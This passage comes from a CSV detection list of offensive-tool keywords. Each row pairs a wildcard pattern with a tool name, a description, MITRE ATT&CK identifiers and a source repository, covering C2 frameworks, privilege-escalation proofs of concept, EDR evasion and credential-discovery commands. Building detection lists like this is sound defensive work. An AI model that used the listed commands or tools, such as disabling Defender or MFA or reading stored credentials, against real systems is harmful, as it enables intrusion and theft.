- TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","60","36","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" +"*dir /a C:\pagefile.sys | findstr /R *","greyware_tool_keyword","find","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*dir C:\Users\*\AppData\Local\Microsoft\Credentials*","offensive_tool_keyword","dir","Find the IDs of protected secrets for a specific user","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dir_create2system.txt*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*dirb *http* /usr/share/seclists/Discovery/Web-Content/big.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dirb/wordlists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dircreate2system.cpp*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*dircreate2system.exe*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*dircreate2system.sln*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*dircreate2system.vcxproj*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*DirCreate2System-main*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*Direct_Syscalls_Create_Thread.c*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct_Syscalls_Create_Thread.exe*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct_Syscalls_Create_Thread.sln*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct_Syscalls_Create_Thread.vcxproj*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*DirectDLL_x64.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DirectDLL_x86.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Directory-Traversal-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*Direct-Syscalls-vs-Indirect-Syscalls.git*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*dirkjan@sanoweb.nl*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*dirkjanm/ldapdomaindump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dirkjanm/PKINITtools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dirkjanm/PrivExchange*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*dirscanner.py*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" +"*dirscraper*","offensive_tool_keyword","dirscraper","Dirscraper is an OSINT scanning tool which assists penetration testers in identifying hidden. or previously unknown. directories on a domain or subdomain. This helps greatly in the recon stage of pentesting as it provide pentesters with a larger attack surface for the specific domain.","T1596 - T1530 - T1201","TA0040 - ","N/A","N/A","Information Gathering","https://github.com/Cillian-Collins/dirscraper","1","1","N/A","N/A","3","212","34","2019-02-24T12:22:47Z","2019-02-21T23:06:58Z" +"*dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dirsearch*","offensive_tool_keyword","dirsearch","Dirsearch is a mature command-line tool designed to brute force directories and files in webservers.","T1110 - T1114 - T1100 - T1313","TA0001 - TA0007","N/A","N/A","Web Attacks","https://github.com/maurosoria/dirsearch","1","0","N/A","N/A","10","10325","2209","2023-10-03T11:22:52Z","2013-04-30T15:57:40Z" +"*dirTraversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*dirTraversal-nix.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*dirTraversal-win.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*dirty_sock*","offensive_tool_keyword","POC","dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/initstring/dirty_sock","1","1","N/A","N/A","7","640","159","2019-05-09T21:34:26Z","2019-02-12T06:02:06Z" +"*dirty_sock/archive/master.zip*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*dirtycow*","offensive_tool_keyword","dirtycow","Linux vulnerability name to go root CVE-2016-5195) Dirty COW est une vulnrabilit de scurit du noyau Linux qui affecte tous les systmes d'exploitation Linux. y compris Android. C'est un dfaut d'lvation de privilge qui exploite une condition de concurrence dans la mise en uvre de la copie sur criture dans le noyau de gestion de la mmoire","T1068 - T1055 - T1574.002","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","multiple pocs on github and others places ","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Dirty-Pipe/exploit-static*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" +"*dirtypipe-exploit/blob/main/dirtypipe.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A",,"N/A",,, +"*-DirtyPipe-Exploits*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","N/A","N/A","5","453","129","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z" +"*dirwalk.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*disable_clamav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*disable_clamav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Disable_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*DisableAllWindowsSoftwareFirewalls*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"*DisableAMSI(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*DisableAntiPhishing*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*DisableAntiPhishing.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*disableeventvwr/*.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" +"*DisableKerberosSigning*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*DisableMailboxAuditing.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*DisableMFA.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*DisableRealtimeMonitoring $true*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*disableWinDef.cpp*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" +"*Disabling ASLR *","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"*discordapp.com/attachments/*/AnyDesk.exe*","offensive_tool_keyword","anydesk","Fake Anydesk distributed by discord - mars stealer","T1566 T1587","N/A","N/A","N/A","Malware","https://www.virustotal.com/gui/url/f83616f0f9cd2337ed40e22b0a675a99d58edf004b31645f56f28f020f5e4f46/detection","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*discordapp.com/attachments/*/BOINCPortable_*.exe*","offensive_tool_keyword","BOINC","Fake BOINC software distributed by discord - mars stealer","T1566 T1587","N/A","N/A","N/A","Malware","https://cyberint.com/wp-content/uploads/2022/02/Mars-Stealer-7.png.webp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Discovery_AccountDiscovery_GetNetDomainUser.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_AccountDiscovery_PowerView.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_ApplicationWindowDiscovery_EnumApplication.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_Microphone_CallInfo.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_Microphone_camera.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_Microphone_record_mic.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_ARPScan.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_NbtScanByPython.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_NextnetByPE.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - 